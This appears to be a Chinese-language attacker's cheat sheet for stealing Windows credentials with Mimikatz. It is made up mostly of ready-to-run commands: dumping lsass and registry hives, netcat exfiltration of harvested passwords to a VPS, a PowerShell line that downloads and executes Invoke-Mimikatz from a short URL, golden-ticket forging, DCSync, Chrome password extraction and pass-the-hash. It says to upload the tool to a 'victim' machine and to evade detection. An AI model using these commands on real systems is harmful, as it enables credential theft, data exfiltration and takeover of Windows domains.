Mimikatz抓取密码

  • mimikatz从windwos抓取账号明文密码,主要是从lsass.exe进程中获取的。还有很多其他功能,这里学习它如何抓取密码。

    常用操作

    上传到受害者机器上,使用mimikatz抓取密码
    1. privilege::debug #提升权限 
    2. sekurlsa::logonpasswords #抓取密码

1)打印执行过程并且导出日志

  1. mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
  2. mk.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2)结果输入到日志中

  1. mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
  2. mk.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3)将结果利用NC反弹到vps

非交互抓明文,不留任何文件,直接把抓取结果用nc发到指定的远程机器上,可能有些端口出不来,换几个常用的即可,80,443,53等。

  1. #受害者机器执行
  2. mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit |  nc -vv VPS_IP 1234  在目标机器上执行
  3. vps执行nc监听
  4. nc -lvp 1234  本地(vps上)机器执行

免杀

1)导出lsass.exe

导出lsass主要下面三种可以导出。

  1. 通过任务管理器找到lsass.exe,右击创建转储文件
  2. 使用 procdump64.exe导出
  3. 使用调用API获取lsass.dmp

procdump64+mimikatz
  1. procdump64.exe -accepteula -ma lsass.exe lsass.dmp
  2. mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

注册表导出凭证
  1. reg save HKLM\SYSTEM sys.hiv
  2. reg save HKLM\SAM sam.hiv
  3. reg save hklm\security security.hiv
  5. #A方法:kali里面有个impacket-secretsdump获取密码
  6. impacket-secretsdump -sam sam.hiv -system sys.hiv -security security.hiv LOCAL
  7. +
  8. mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv

2)使用powershell

  1. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Tips:powershell 默认windows visa后才有。也可以将结果发送到vps上。

其他用法

1) 黄金票据

  1. [*] 制作
  2.     mimikatz # kerberos::golden /krbtgt:26e67be3519825ba5c9f4f95af987fac /admin:Administrator /domain:rcoil.me /sid:S-1-5-21-3847150913-2250841228-2965060751 /ticket:Administrator.kiribi
  3. [*] 使用
  4.     mimikatz # kerberos::ptt Administrator.kiribi
  5.     mimikatz # kerberos::tgt

2) 获取 vpn 密码

  1. mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

3) 浏览器密码

  1. mimikatz.exe privilege::debug log "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data1\" /unprotect" exit //读chrome密码

4) 获取某用户的密码

  1. mimikatz lsadump::dcsync /domain:test.me /user:test

PTH

  1. sekurlsa::pth /user:administrator /domain:x.x.x.x /ntlm:e8764a936b744587359a353ee3fbd5d1 /run:"C:\Windows\System32\mstsc.exe"
  2. sekurlsa::pth /user:administrator /domain:tencent /ntlm:e8764a936b744587359a353ee3fbd5d1 "/run:mstsc.exe /restrictedadmin"

image.png

  1. mimikatz发布了⼀个Pre-release版本[1],提供了ts::logonpasswords⼀键抓取,不过在2008上不起作⽤,等待明
  2. 继续更新。